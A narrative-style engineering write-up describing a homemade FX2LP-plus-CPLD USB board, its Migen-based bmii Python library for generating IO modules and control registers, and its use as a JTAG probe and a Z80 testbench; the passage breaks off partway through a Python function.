An I2C EEPROM had been connected to the USB controller in order to store its firmware in a persistent way. The internal reset logic of the FX2LP was designed to scan the I2C bus for an EEPROM from which a valid firmware could be loaded. Once the program was fully copied to internal RAM, no further operations were performed on this bus.

After several tries, they finally validated the following schematic:

### Section II: ...To Copper

Once the design was approved, the next step was to draw the printed circuit board. Two layers were enough to route the entire netlist within an area of 5x5cm.

The top layer was dedicated to voltage regulation, the CPLD, connectors and a couple of switches and LEDs. Meanwhile, the bottom one contained the whole circuit required to make the USB controller work: crystal, EEPROM, I2C pull-up resistors, ...

IOs from the CPLD were exposed via 2 dual-row 20-pin female headers of 2.54mm pitch.

As the board was manually soldered, it was not conceivable for them to use BGA components for this prototype. So the 100-pin LQFP version of the CPLD was used, as well as the 56-pin SSOP package of the Cypress chip.

After hours of painful electrical tests, a first sample of a fully soldered board was born by the end of the Spring:

## Chapter II: On Reprogrammability They Hoped

Although the physical board was ready, a firmware was still needed to make it work. The situation was more complex than a simple binary located in a single ROM, as is the case for most boards of this category.

First of all, the firmware for the FX2LP was implemented, which basically consisted of configuring the USB and GPIF units of the chip. Nothing uncommon here: writing applications for this kind of microcontroller was quite easy, as it was well documented and tons of similar uses of this chip already existed and were publicly available. The code was written in a couple of hours and no new features were added afterwards, as they decided to make the firmware serve one unique purpose: translating USB data to the IO controller in the simplest and most lightweight way.

For them, most of the customizations that would be needed should be fully-implemented at the IO controller level. The real challenge here was to take advantage of the CPLD as a powerful and programmable IO controller.

One solution would be to base the CPLD's design on a soft-processor: modifying IO's behaviour would mean loading a new firmware into its RAM. Although this architecture was quite common when using an FPGA, it became more inconvenient when basing it on a CPLD due to the lack of memory blocks.

The second solution would be to dynamically generate and configure the design of the CPLD according to the user's needs. As pursuing this concept using a regular hardware description language seemed almost impossible to them, they decided to fully base the design generation on Migen. This Python module allowed the meta-programming of synchronous register-transfer-level designs and handled the generation of a Verilog file that could then be synthesised by the regular Altera toolchain.

### Section I: Modularity And Modulation

They fully defined the architecture around the concept of modularity. To demonstrate how it would transpire in a real context, they took the example of a Pulse-Width Modulation interface.

The main principle of this technique was to use a rectangular pulse wave whose pulse width was modulated, resulting in a variation of the average value of the waveform.

A possible implementation of a PWM module could be achieved by using a counter whose width defined the period of the signal and a digital comparator to generate the needed duty cycle.

In this case, the only signal that was likely exposed externally would be the output of the comparator, negated or not. Moreover, a 'parameter' of this circuit would be the left-input of the comparator and was typically the kind of signal that would be interesting to implement as a register writable from the host.

For their example, they also considered that the counter value could be watched from the host.

The 'parameter' signals were called 'Control Registers' and were intended to be readable and/or writable from the host while the signals that would be eligible to be mapped to a physical pin of the CPLD were called 'IO Signals'.

In a more generic way, this kind of module, that they called 'IO Module', could always be represented according to the following template:

• An internal logic block that could contain both combinational and sequential logic left to IO Module's discretion.

• 'Control Registers' connected to an internal bus and used to watch and control the activity of the internal logic from the host.

• 'IO Signals' intended to interact with an external component and to be mapped to real pin.

Imposing this kind of interface also meant imposing a huge, redundant and overblown amount of HDL code only to ensure the glue logic between the core logic of the module and the rest of the design. This was where meta-programming became appropriate.

A Python module called bmii had been developed to extend the structures provided by Migen. For instance, an extension of the 'Module' objects was included in this library to add all the facilities needed to generate the intended glue logic.

```python
from bmii import *

iom = IOModule("pwm")
```

This object contained the cregs special attribute which was used to manage the control registers of the IOModule. CtrlReg was charged to construct a special 8-bit width Migen's Signal which embedded extra information needed to build the control registers network. The direction of such register had to be manually specified during instantiation. It could be:

• RDONLY: Only readable from the host. The signal had to be driven by the internal logic of the IOModule.
• WRONLY: The signal could be written from the host but could not be read back. This direction was useful as a hint for the toolchain to synthesise this signal as a wire instead of a Verilog reg.
• RDWR: The signal could be read and written from the host. Synthesis of this kind of signal would likely result in a Verilog reg.

For the PWM IOModule, only the pulse's WIDTH and the COUNTER signals had to be accessed from the host.

```python
iom.cregs += CtrlReg("WIDTH", CtrlRegDir.RDWR)
iom.cregs += CtrlReg("COUNTER", CtrlRegDir.RDONLY)
```

In the same way, the iosignals attribute handled the signals intended to be mapped to physical pins. An IOSignal always corresponded to a 1-bit wide signal. The direction of an IOSignal also had to be specified explicitly.

• OUT: Signal driven by the IOModule.
• IN: Signal driven by an external component and read by the IOModule's logic.
• DIRCTL: Signal driven by the IOModule and used to control the tri-state buffer of a pin.

The PWM only used two outputs:

```python
iom.iosignals += IOSignal("OUT", IOSignalDir.OUT)
iom.iosignals += IOSignal("NOUT", IOSignalDir.OUT)
```

Finally, the internal logic could be described by using Migen's special attributes:

```python
iom.sync += iom.cregs.COUNTER.eq(iom.cregs.COUNTER + 1)
iom.comb += iom.iosignals.OUT.eq(iom.cregs.COUNTER < iom.cregs.WIDTH)
iom.comb += iom.iosignals.NOUT.eq(~iom.iosignals.OUT)
```
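The behaviour of this PWM can be checked without any hardware. The following is only a plain-Python model of the three statements above, assuming an 8-bit free-running counter (the width of a control register); the function name `simulate_pwm` is hypothetical and not part of bmii.

```python
def simulate_pwm(width, ticks=256, counter_bits=8):
    """Return the OUT level for each clock tick of the PWM model."""
    mask = (1 << counter_bits) - 1
    counter = 0
    out = []
    for _ in range(ticks):
        # Combinational part: OUT = (COUNTER < WIDTH)
        out.append(1 if counter < width else 0)
        # Synchronous part: COUNTER <= COUNTER + 1, wrapping at 8 bits
        counter = (counter + 1) & mask
    return out


levels = simulate_pwm(width=42)
duty = sum(levels) / len(levels)
print("high ticks: {}, duty cycle: {:.1%}".format(sum(levels), duty))
```

Under these assumptions the duty cycle is simply WIDTH / 256, which is why exposing WIDTH as a writable register is enough to control the output.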

### Section II: An Iron Hand In A Velvet Glove

The concept of control register had been illustrated and justified. Their aim was then to work out how to make these registers accessible from the host over USB.

Concretely, this step meant defining a unit that would be able to translate GPIF waveforms to a more convenient protocol to drive the internal bus. This unit had been called 'Northbridge'.

The internal bus had been defined as follows:

• MOSI[0:7] and MISO[0:7] represented the two directions of the data bus.
• WR distinguished a read or a write operation.
• MADDR[0:2] and RADDR[0:4] were used to generate the chip select signal for a module and a control register respectively.
• REQ informed the control register that an operation was going to be performed.

The issue here was that the GPIF data bus had exactly the same width as a control register. This meant that the addressing and the read/write operation on the internal bus could not both be achieved in a single clock tick.

From the GPIF point of view, performing an operation on the internal bus meant sending the module/control register address (latched by the Northbridge) before proceeding to the actual read/write operation.

The northbridge managed the GPIF's control signals as follows:

• CTL0 and CTL1 were basically forwarded to the REQ and WR signals of internal bus respectively.
• CTL2 was used to indicate that the USB controller was latching an address and that the current operation must not be considered as a regular write operation.

The northbridge polled for operations by checking the value of the CTL0 signal on each tick of the interface clock.
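The two-phase access described above (latch an address, then transfer data) can be sketched as a small behavioural model. This is only an illustration: the class `NorthbridgeModel`, the helper `pack_address` and, in particular, the packing of MADDR and RADDR into a single address byte are assumptions, not details taken from the actual design.

```python
class NorthbridgeModel:
    """Toy model of the two-phase access: latch an address, then transfer data."""

    def __init__(self):
        self.maddr = 0   # 3-bit module address
        self.raddr = 0   # 5-bit control register address
        self.regs = {}   # (maddr, raddr) -> 8-bit value

    def cycle(self, ctl0, ctl1, ctl2, data=0):
        """One GPIF operation: ctl0 = REQ, ctl1 = WR, ctl2 = address latch."""
        if not ctl0:
            return None                      # no request pending
        if ctl2:
            # Address phase (hypothetical packing: MADDR in bits 7..5,
            # RADDR in bits 4..0); not a regular write
            self.maddr = (data >> 5) & 0x7
            self.raddr = data & 0x1F
            return None
        key = (self.maddr, self.raddr)
        if ctl1:
            self.regs[key] = data & 0xFF     # regular write
            return None
        return self.regs.get(key, 0)         # regular read


def pack_address(maddr, raddr):
    """Build the address byte used by this model (assumed layout)."""
    return ((maddr & 0x7) << 5) | (raddr & 0x1F)


nb = NorthbridgeModel()
nb.cycle(1, 1, 1, pack_address(2, 0))   # latch module 2, register 0
nb.cycle(1, 1, 0, 42)                   # write 42 to it
nb.cycle(1, 1, 1, pack_address(2, 0))   # latch the same address again
value = nb.cycle(1, 0, 0)               # read it back
```

The point of the sketch is that every register access costs at least two bus operations, because the 8-bit data bus has to carry the address first.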

In addition to holding a value, control registers were generated with extra signals that represented the operation currently being performed on them, which made them easier to use from the internal logic.

The wr and rd signals indicated that the control register was selected and that a write or read operation, respectively, was going to be performed. These signals were asserted for several clock ticks as they were directly forwarded by the northbridge from the GPIF. To make them easier to use in a synchronous circuit, wr_pulse and rd_pulse were derived from them. Using a 'level to pulse' state machine, wr_pulse was asserted for exactly one clock tick when the write operation completed, indicating to the internal logic that a valid value was available in the register. Meanwhile, rd_pulse marked the beginning of the read operation to inform the IOModule that the control register was about to be read, giving it time to feed a correct value before the next falling edge of the rd signal, the moment when the value was actually captured by the northbridge.
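The 'level to pulse' idea can be illustrated with a simple edge detector written in plain Python. This is a sketch of the principle only, not the generated RTL; the function name `level_to_pulses` is hypothetical.

```python
def level_to_pulses(levels):
    """Derive one-tick pulses from a level that stays high for several ticks.

    Returns (start_pulse, end_pulse):
      - start_pulse is high on the first tick where the level is high
        (the behaviour described for rd_pulse),
      - end_pulse is high on the first tick after the level went low again
        (the behaviour described for wr_pulse).
    """
    start, end = [], []
    prev = 0
    for lvl in levels:
        start.append(1 if (lvl and not prev) else 0)
        end.append(1 if (prev and not lvl) else 0)
        prev = lvl
    return start, end


wr = [0, 1, 1, 1, 0, 0]          # level forwarded from the GPIF
start_pulse, end_pulse = level_to_pulses(wr)
print(start_pulse)               # [0, 1, 0, 0, 0, 0]
print(end_pulse)                 # [0, 0, 0, 0, 1, 0]
```

Whatever the duration of the level, each operation produces exactly one pulse, which is what a synchronous consumer such as a FIFO needs.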

At that point, any control register could be accessed from the host using the correct USB request. In order to make the usage of the USB easier from the host point of view, an additional interface had been introduced: the BMIIModule.

A python object of this type contained two special attributes: the first one was the IOModule which represented the RTL design while the second was called the driver of the BMIIModule. Automatically created, the drv attribute was able to inspect the IOModule to generate the correct USB request according to the information specified in the RTL about the control registers addresses and directions.

```python
pwm = BMIIModule(iom)
```

To finalize the generation of the IO controller design, the BMII object acted as a top-level representation of the whole design of the board. It had to be informed of each new module through its add_module method.

A call to this procedure meant connecting the IOModule to the internal bus, allocating module and control registers addresses.

```python
b = BMII()
b.add_module(pwm)
```

Once the CPLD was configured, the host could easily access the control registers by simply getting or setting the attributes of drv named after the control registers:

```python
pwm.drv.WIDTH = 42
cnt = int(pwm.drv.COUNTER)
```
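How such attribute access can be turned into bus requests is sketched below. None of these classes come from bmii: `FakeBus` stands in for the USB transport and `Driver` is a hypothetical, simplified counterpart of the drv attribute that returns plain integers.

```python
class FakeBus:
    """Stand-in for the USB transport: records requests instead of sending them."""

    def __init__(self):
        self.mem = {}
        self.log = []

    def write(self, maddr, raddr, value):
        self.log.append(("W", maddr, raddr, value))
        self.mem[(maddr, raddr)] = value & 0xFF

    def read(self, maddr, raddr):
        self.log.append(("R", maddr, raddr))
        return self.mem.get((maddr, raddr), 0)


class Driver:
    """Maps attribute access to bus requests using the register description."""

    def __init__(self, bus, maddr, regs):
        # regs: name -> (raddr, direction); bypass our own __setattr__ here
        object.__setattr__(self, "_bus", bus)
        object.__setattr__(self, "_maddr", maddr)
        object.__setattr__(self, "_regs", regs)

    def __getattr__(self, name):
        # Only called for names that are not regular instance attributes
        regs = object.__getattribute__(self, "_regs")
        if name not in regs:
            raise AttributeError(name)
        raddr, direction = regs[name]
        if direction == "WRONLY":
            raise AttributeError("{} is write-only".format(name))
        return self._bus.read(self._maddr, raddr)

    def __setattr__(self, name, value):
        if name not in self._regs:
            raise AttributeError(name)
        raddr, direction = self._regs[name]
        if direction == "RDONLY":
            raise AttributeError("{} is read-only".format(name))
        self._bus.write(self._maddr, raddr, value)


bus = FakeBus()
drv = Driver(bus, maddr=2, regs={"WIDTH": (0, "RDWR"), "COUNTER": (1, "RDONLY")})
drv.WIDTH = 42
width = drv.WIDTH
```

Because the directions are known from the RTL description, an invalid access (for instance writing to COUNTER) can be rejected on the host before any USB request is issued.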

### Section III: The Signal Goes South

In the same way the northbridge managed the communication with the external USB controller, another dedicated unit had been defined to handle the multiplexing of the IOSignals to physical IO pins. Naturally called the southbridge, it was implemented as a special IOModule which had no IOSignals of its own and was only responsible for managing the signals coming from other modules. For each physical pin, the southbridge was responsible for generating the following circuit:

Each pin was considered bidirectional and the direction could be configured with an IOSignal defined as such. An unlimited number of signals could read the value of a pin while only one could drive it.

To inform the southbridge that an IOSignal had to be connected to a pin, the signal had to be added to the pins attribute of this unit as follows:

```python
b.ioctl.sb.pins.LED0 += pwm.iomodule.iosignals.OUT
```

The direction declared in the definition of the IOSignal was used to determine where the signal had to be connected in the pin multiplexing circuit.

As the southbridge was considered as a regular IOModule, it was connected to the internal bus and therefore exposed its own control registers. This opportunity was leveraged to make the pins controllable from the host, bypassing the need to define a specific IOModule when only a simple operation had to be performed on the IOs.

The PINDIR, PINDIRMUX, PINOUT, PINMUX and PINSCAN signals of each pin were accessible through the southbridge's control registers. For instance, toggling an LED could be done with:

```python
b.modules.southbridge.drv.PINMUXMISC.LED1 = 1  # Make the southbridge drive the LED1 pin
b.modules.southbridge.drv.PINOUTMISC.LED1 = \
    int(b.modules.southbridge.drv.PINSCANMISC.LED1) ^ 1  # Toggle the LED1 pin
```

For the example design previously defined, a complete mapping of the internal bus's address space looked as follows:

```python
b.list_modules()
```

```
0x0: northbridge
    0x0: IDCODE (CtrlRegDir.RDONLY)
    0x1: SCRATCH (CtrlRegDir.RDWR)
0x1: southbridge
    0x0: PINDIR1L (CtrlRegDir.RDWR)
    0x1: PINDIR1H (CtrlRegDir.RDWR)
    0x2: PINDIR2L (CtrlRegDir.RDWR)
    0x3: PINDIR2H (CtrlRegDir.RDWR)
    0x4: PINSCAN1L (CtrlRegDir.RDONLY)
    0x5: PINSCAN1H (CtrlRegDir.RDONLY)
    0x6: PINSCAN2L (CtrlRegDir.RDONLY)
    0x7: PINSCAN2H (CtrlRegDir.RDONLY)
    0x8: PINSCANMISC (CtrlRegDir.RDONLY)
    0x9: PINMUX1L (CtrlRegDir.RDWR)
    0xa: PINMUX1H (CtrlRegDir.RDWR)
    0xb: PINMUX2L (CtrlRegDir.RDWR)
    0xc: PINMUX2H (CtrlRegDir.RDWR)
    0xd: PINDIRMUX1L (CtrlRegDir.RDWR)
    0xe: PINDIRMUX1H (CtrlRegDir.RDWR)
    0xf: PINDIRMUX2L (CtrlRegDir.RDWR)
    0x10: PINDIRMUX2H (CtrlRegDir.RDWR)
    0x11: PINMUXMISC (CtrlRegDir.RDWR)
    0x12: PINOUT1L (CtrlRegDir.RDWR)
    0x13: PINOUT1H (CtrlRegDir.RDWR)
    0x14: PINOUT2L (CtrlRegDir.RDWR)
    0x15: PINOUT2H (CtrlRegDir.RDWR)
    0x16: PINOUTMISC (CtrlRegDir.RDWR)
0x2: PWM
    0x0: WIDTH (CtrlRegDir.RDWR)
    0x1: COUNTER (CtrlRegDir.RDONLY)
```

The northbridge used two control registers defined for testing purposes only. The IDCODE contained a magic number read by the USB controller to verify the validity of the CPLD's configuration while the SCRATCH register was used to test write operations on the bus.
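The address map above is consistent with a simple sequential allocation: modules are numbered in insertion order and registers in declaration order. The sketch below only illustrates that scheme with the bus widths given earlier (3-bit MADDR, 5-bit RADDR); the `allocate` function is hypothetical and the real allocation strategy of bmii may differ.

```python
MAX_MODULES = 1 << 3    # MADDR is 3 bits wide
MAX_REGS = 1 << 5       # RADDR is 5 bits wide


def allocate(modules):
    """modules: list of (name, [register names]) in insertion order."""
    if len(modules) > MAX_MODULES:
        raise ValueError("too many modules for a 3-bit MADDR")
    table = {}
    for maddr, (name, regs) in enumerate(modules):
        if len(regs) > MAX_REGS:
            raise ValueError("too many registers in {}".format(name))
        table[name] = (maddr, {reg: raddr for raddr, reg in enumerate(regs)})
    return table


table = allocate([
    ("northbridge", ["IDCODE", "SCRATCH"]),
    ("southbridge", ["PINDIR1L", "PINDIR1H"]),   # truncated for brevity
    ("PWM", ["WIDTH", "COUNTER"]),
])
print(table["PWM"])   # (2, {'WIDTH': 0, 'COUNTER': 1})
```

With these widths, a design is limited to 8 modules of at most 32 control registers each, the southbridge alone using 23 of its 32 slots.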

To sum up, the following architecture had been defined as the basis for further improvements:

### Section IV: An Autarchical Sequence

As this architecture mainly relied on the flexibility provided by the CPLD, one issue remained before it became truly usable: the compiling and programming sequences of a BMII design had to stay self-contained and avoid the need for external hardware tools.

The building sequence aimed to produce the binary blob of the USB firmware as well as the bitstream of the IO controller. For the FX2LP, a ninja build file was generated to compile the custom firmware using sdcc.

Concerning the IO controller, the Verilog generation was left to Migen while the bitstream was built by Quartus.

```python
b.build_all()
```

The programming sequence was a bit trickier. A first and trivial way to achieve this was to use a USB Blaster JTAG probe to configure the CPLD with the desired bitstream. In order to make the board self-programmable, the CPLD's JTAG signals had been connected to a tri-state buffer in addition to the regular 10-pin JTAG header. Implemented with a standard 74244, this buffer was driven by the USB controller. The goal of this circuit was to let the USB controller communicate with the CPLD via JTAG when the JTAGE signal was asserted.

To be able to reuse Quartus Programmer software to program the CPLD, the open-source implementation of the USB Blaster protocol for FX2LP (ixo.de USB JTAG) had been adapted to match the wiring of their circuit.

```python
b.program_all()
```

The programming sequence could be summarized as follows:

• The first step was to load the custom USB Blaster firmware into the USB controller using fxload.
• If a JTAG IDCODE scan was successful, the bitstream was uploaded using Quartus Programmer.
• To be able to write their own FX2LP firmware to the EEPROM, a second stage firmware loader was programmed in the chip. It added a new USB vendor command allowing writing operations on the I2C bus.
• Finally, the regular firmware was loaded in the USB controller.

## Chapter III: The Fellowship Of The Joint Test

As a first application of their board, the second tinkerer proposed to implement a full-featured JTAG probe that anyone could use as an alternative to Flyswatter, Bus Blaster or any other cheap JTAG probe.

JTAG is a standard for on-chip instrumentation based on a dedicated debug port implementing a serial communication interface. This protocol was well-defined and simple enough to be used as a comprehensive example.

The third one replied that demonstrating the usefulness of their project by trying to mimic other well-known and mature JTAG probes was a waste of time, since reaching comparable performance would require more effort than he could imagine at the time.

The first tinkerer tempered that argument by pointing out that no cheap JTAG probe was generic enough to be compatible with a very wide range of platforms, and that very few of them were designed to be used in contexts other than CPU on-chip debugging. The third tinkerer agreed and started to think about a possible implementation of such a protocol using their project.

### Section I: The Bridge Of Shockley

Even though the JTAG standard was quite strict about the communication logic, the electrical characteristics of the signals were left to the target device. This meant that the probe had the responsibility to drive them with the target voltage.

Assuming that the main board was only able to drive 3.3V IOs, it had to be expanded with the required interface.

A first version had been implemented using voltage level shifters and worked well with some mainstream devices. However, some platforms from specific manufacturers pulled up their JTAG signals with very low-value resistors, which forced the probe to drive more current than most voltage level shifters could supply.

As a quick fix, the expansion board had been equipped with bipolar junction transistors for output signals.

More generally, they thought that being forced to design an expansion board to electrically adapt signals between the main board and the driven target was not a big deal. The main board's IOs simply could not be electrically universal.

### Section II: The Self-Surgery

For a naive implementation of the JTAG protocol, the IOModule simply connected the TMS and TDI outputs to a write-only control register while wiring TCK to its wr_pulse signal. In this configuration, each JTAG clock tick was triggered by writing to this control register.

Each device on a JTAG daisy chain communicated via a Test Access Port (TAP). This hardware unit implemented a stateful protocol to expose its debug facilities. As it was possible to make all TAPs converge to a stable reset state, it was easy to walk through this state machine while keeping all TAPs synchronized.

Assuming this, a single state machine was implemented in the IOModule to keep track of the current TAP state. A control register had been allocated to allow the host to check this state when needed.
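The state machine being tracked is the standard 16-state TAP controller, whose transitions depend only on the TMS level at each TCK tick. The following is a plain-Python model of that standard state diagram, not the RTL of the IOModule; the names `TAP_NEXT` and `walk` are hypothetical.

```python
TAP_NEXT = {
    # state: (next state if TMS=0, next state if TMS=1)
    "TEST_LOGIC_RESET": ("RUN_TEST_IDLE", "TEST_LOGIC_RESET"),
    "RUN_TEST_IDLE":    ("RUN_TEST_IDLE", "SELECT_DR_SCAN"),
    "SELECT_DR_SCAN":   ("CAPTURE_DR", "SELECT_IR_SCAN"),
    "CAPTURE_DR":       ("SHIFT_DR", "EXIT1_DR"),
    "SHIFT_DR":         ("SHIFT_DR", "EXIT1_DR"),
    "EXIT1_DR":         ("PAUSE_DR", "UPDATE_DR"),
    "PAUSE_DR":         ("PAUSE_DR", "EXIT2_DR"),
    "EXIT2_DR":         ("SHIFT_DR", "UPDATE_DR"),
    "UPDATE_DR":        ("RUN_TEST_IDLE", "SELECT_DR_SCAN"),
    "SELECT_IR_SCAN":   ("CAPTURE_IR", "TEST_LOGIC_RESET"),
    "CAPTURE_IR":       ("SHIFT_IR", "EXIT1_IR"),
    "SHIFT_IR":         ("SHIFT_IR", "EXIT1_IR"),
    "EXIT1_IR":         ("PAUSE_IR", "UPDATE_IR"),
    "PAUSE_IR":         ("PAUSE_IR", "EXIT2_IR"),
    "EXIT2_IR":         ("SHIFT_IR", "UPDATE_IR"),
    "UPDATE_IR":        ("RUN_TEST_IDLE", "SELECT_DR_SCAN"),
}


def walk(state, tms_bits):
    """Apply one TMS value per TCK tick and return the final state."""
    for tms in tms_bits:
        state = TAP_NEXT[state][tms]
    return state


# Five ticks with TMS high reach the reset state from anywhere
assert all(walk(s, [1] * 5) == "TEST_LOGIC_RESET" for s in TAP_NEXT)

# From reset, TMS = 0, 1, 1, 0, 0 leads to the instruction shift state
print(walk("TEST_LOGIC_RESET", [0, 1, 1, 0, 0]))   # SHIFT_IR
```

The first check is the property the text relies on: since every TAP can be forced into the same reset state, a single tracker on the probe side is enough to follow the whole chain.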

Devices responded to JTAG scans on the TDO signal. A FIFO block was used to buffer received data before it was read by the host through a read-only register. This case perfectly demonstrated the usage of the rd_pulse signal since it was used to dequeue the next value of the FIFO submodule.

Although most platforms' JTAG daisy chains were short and fixed, some of them could dynamically append TAPs to the chain, making general-purpose JTAG tools unusable. To handle this kind of situation, facilities had been implemented to describe a dynamic TAP network.

```python
from bmii.modules.jtag import JTAG, TAP, DR
```

A JTAG object extended a regular BMIIModule to abstract the low-level operations of the JTAG's IOModule.

TAP and DR were provided to describe the current layout of the TAP network. For instance, describing the Max V's JTAG would look like this:

```python
class AlteraMaxVJTAG(JTAG):
    def __init__(self):
        JTAG.__init__(self)

        tap = TAP("CPLDTAP", 10)  # 10-bit instruction register

        #         name              instr.        reg. length
        tap += DR("SAMPLE/PRELOAD", 0b0000000101, 480)
        tap += DR("EXTEST",         0b0000001111, 480)
        tap += DR("BYPASS",         0b1111111111, 1)
        tap += DR("USERCODE",       0b0000000111, 32)
        tap += DR("IDCODE",         0b0000000110, 32)
        tap += DR("HIGHZ",          0b0000001011, 1)
        tap += DR("CLAMP",          0b0000001010, 32)
        tap += DR("USER0",          0b0000001100, 32)
        tap += DR("USER1",          0b0000001110, 32)

        self.add_tap(tap)

    @classmethod
    def default(cls, bmii):
        jtag = cls()
        bmii.add_module(jtag)

        bmii.ioctl.sb.pins.IO10 += jtag.iomodule.iosignals.TMS
        bmii.ioctl.sb.pins.IO11 += jtag.iomodule.iosignals.TCK
        bmii.ioctl.sb.pins.IO12 += jtag.iomodule.iosignals.TRST
        bmii.ioctl.sb.pins.IO13 += jtag.iomodule.iosignals.TDI
        bmii.ioctl.sb.pins.IO21 += jtag.iomodule.iosignals.TDO

        return jtag
```

According to that description, scanning the IDCODE of the device could be simply done by:

```python
b = BMII()
jtag = AlteraMaxVJTAG.default(b)

jtag.reset()
jtag.irdrscan("CPLDTAP", "IDCODE")
```
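The 32-bit value returned by such an IDCODE scan follows the standard JTAG layout: a marker bit, an 11-bit manufacturer identity, a 16-bit part number and a 4-bit version. The decoder below is a small sketch of that layout; the function name is hypothetical and the sample value is only chosen for illustration, it was not captured from the board.

```python
def decode_idcode(idcode):
    """Split a 32-bit JTAG IDCODE into its standard fields."""
    return {
        "marker": idcode & 0x1,                  # always 1 for a valid IDCODE
        "manufacturer": (idcode >> 1) & 0x7FF,   # 11-bit JEDEC-derived identity
        "part": (idcode >> 12) & 0xFFFF,         # 16-bit part number
        "version": (idcode >> 28) & 0xF,         # 4-bit version
    }


fields = decode_idcode(0x020A50DD)   # illustrative value only
print({name: hex(value) for name, value in fields.items()})
# {'marker': '0x1', 'manufacturer': '0x6e', 'part': '0x20a5', 'version': '0x0'}
```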

A possible improvement would be to generate this TAP network directly from the BSDL files of the daisy-chained devices. The use of BJTs to drive JTAG signals was also only a quick and easy response to the low pull-up resistance problem. The third tinkerer complained that many other solutions could have been implemented, as the BJTs had a very long switching time and forced the signals to be driven at 12MHz when many targets supported debug port clocks of up to 100MHz.

## Chapter IV: And In Darkness Bind Them

Sceptical about the results of the first application, the third tinkerer thought about a niche application that only a few people would actually need. Enthusiastic but upset by the pragmatism of the two others, he left the group to develop his idea on his own.

For him, a second purpose for this board was purely and simply to act as a test bench for analysing black-boxed devices. To demonstrate his idea, he chose the first device he could find in his drawer: a Z80 packaged in a DIP-40.

Primarily sold by Zilog as an improved Intel 8080, it had become a very popular processor for simple embedded applications since it was truly easy to make this chip work in a custom circuit. This device was therefore the perfect guinea pig for his experiments.

### Section I: The Calm Before The Storm

Before trying to blow up the chip, defining the RTL needed to correctly drive the CPU was necessary.

```python
iom = IOModule("Z80TB")
```

The DIP-40 version of this CPU exposed a 16-bit address bus and an 8-bit data bus. As the latter was bidirectional, three different IOSignals had to be defined: DIN, DOUT and DDIR. In order to keep the main board and the device under test synchronized, the CPU's clock was managed by the IOModule. All other required control signals were defined as IOSignals.

```python
ADDRESS_WIDTH = 14 # Truncated, actually 16.
DATA_WIDTH = 8

iom.iosignals += IOSignal("CLK", IOSignalDir.OUT)
iom.iosignals += IOSignal("_M1", IOSignalDir.IN)
iom.iosignals += IOSignal("_MREQ", IOSignalDir.IN)
iom.iosignals += IOSignal("_IOREQ", IOSignalDir.IN)
iom.iosignals += IOSignal("_RD", IOSignalDir.IN)
iom.iosignals += IOSignal("_WR", IOSignalDir.IN)
iom.iosignals += IOSignal("_WAIT", IOSignalDir.OUT)
iom.iosignals += IOSignal("_HALT", IOSignalDir.IN)
iom.iosignals += IOSignal("_RESET", IOSignalDir.OUT)
iom.iosignals += IOSignal("_RFSH", IOSignalDir.IN)

for i in range(ADDRESS_WIDTH):
    iom.iosignals += IOSignal("A{}".format(i), IOSignalDir.IN)

oe = Signal()  # output enable shared by all data pins
for i in range(DATA_WIDTH):
    iom.iosignals += IOSignal("DIN{}".format(i), IOSignalDir.IN)
    iom.iosignals += IOSignal("DOUT{}".format(i), IOSignalDir.OUT)
    iom.iosignals += IOSignal("DDIR{}".format(i), IOSignalDir.DIRCTL)
    iom.comb += getattr(iom.iosignals,"DDIR{}".format(i)).eq(oe)
```

From the host point of view, the only reasonable access points were the state of the CPU, the address it was accessing and the data it transferred.

```python
iom.cregs += CtrlReg("STATE", CtrlRegDir.RDONLY)

iom.cregs += CtrlReg("DIN", CtrlRegDir.RDONLY)
for i in range(DATA_WIDTH):
    iom.comb += iom.cregs.DIN[i].eq(getattr(iom.iosignals, "DIN{}".format(i)))

iom.cregs += CtrlReg("DOUT", CtrlRegDir.WRONLY)
for i in range(DATA_WIDTH):
    iom.comb += getattr(iom.iosignals, "DOUT{}".format(i)).eq(iom.cregs.DOUT[i])

iom.cregs += CtrlReg("ADDRL", CtrlRegDir.RDONLY)
iom.cregs += CtrlReg("ADDRH", CtrlRegDir.RDONLY)
for i in range(ADDRESS_WIDTH):
    if i < 8:
        addr = iom.cregs.ADDRL
    else:
        addr = iom.cregs.ADDRH
    iom.comb += addr[i % 8].eq(getattr(iom.iosignals, "A{}".format(i)))
```

A special control register had been added to perform special control operations on the CPU. It was mainly used to manually control the RESET signal forcing the reset of the chip from any CPU state.

```python
iom.cregs += CtrlReg("CTL", CtrlRegDir.RDWR)
iom.cregs.CTL[0] = "RESET"

iom.comb += iom.iosignals._RESET.eq(~iom.cregs.CTL.RESET)
```

The clock signal of the Z80 had been fixed to half the frequency of the system clock. Due to the clocking requirements of the chip, this signal was fixed to 8MHz.

```python
iom.sync += iom.iosignals.CLK.eq(~iom.iosignals.CLK)
```

Requests from the Z80 CPU were handled in 3 stages. As long as the CPU was not halted and had no pending request, the testbench stayed in an IDLE state. During this stage, the CPU was still performing operations internally but did not request any external resources.

The second stage followed a request detection. The goal here was to freeze the CPU execution until the host provided an instruction to the testbench about how to handle the request.

Finally, the last stage meant actually responding to CPU's request according to host instructions.

```python
from enum import IntEnum

class Z80State(IntEnum):
    UNKNOWN = 0b00000000
    IDLE    = 0b00000001
    FETCH   = 0b00000010
    MEMRD   = 0b00000100
    MEMWR   = 0b00001000
    IORD    = 0b00010000
    IOWR    = 0b00100000
    HALTED  = 0b01000000
```

To implement this state machine in the RTL, Migen provided facilities to define FSMs in its generic library:

```python
from migen.genlib.fsm import FSM, NextState

fsm = FSM()
iom.submodules += fsm
```

According to the Z80 waveforms, a request for bus access was asserted using _MREQ or _IOREQ. During the request initiation, _RD, _WR and the address bus were driven and valid.

When leaving the IDLE state, the testbench could determine what kind of request was going to be performed and could notify the host about it.

```python
fsm.act("IDLE",
        iom.cregs.STATE.eq(Z80State.IDLE),
        If(~iom.iosignals._HALT, NextState("HALTED")).\
        Else(
            If(~iom.iosignals._MREQ & iom.iosignals._RFSH,
                If(~iom.iosignals._RD,
                    If(~iom.iosignals._M1, NextState("FETCH")).\
                    Else(NextState("MEMRD"))).\
                Elif(~iom.iosignals._WR, NextState("MEMWR"))).\
            Elif(~iom.iosignals._IOREQ,
                If(~iom.iosignals._WR, NextState("IOWR")).\
                Elif(~iom.iosignals._RD, NextState("IORD")))))

fsm.act("HALTED",
        iom.cregs.STATE.eq(Z80State.HALTED),
        If(iom.iosignals._HALT, NextState("IDLE")))
```
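The decision tree of the IDLE state can be mirrored in plain Python, which makes it easy to check by hand which combination of control lines leads to which state. This is only a sketch with a hypothetical function name; all arguments are the raw, active-low pin levels (0 means asserted).

```python
def classify(mreq_n, iorq_n, rd_n, wr_n, m1_n, rfsh_n, halt_n):
    """Return the state the testbench would enter from IDLE."""
    if not halt_n:
        return "HALTED"
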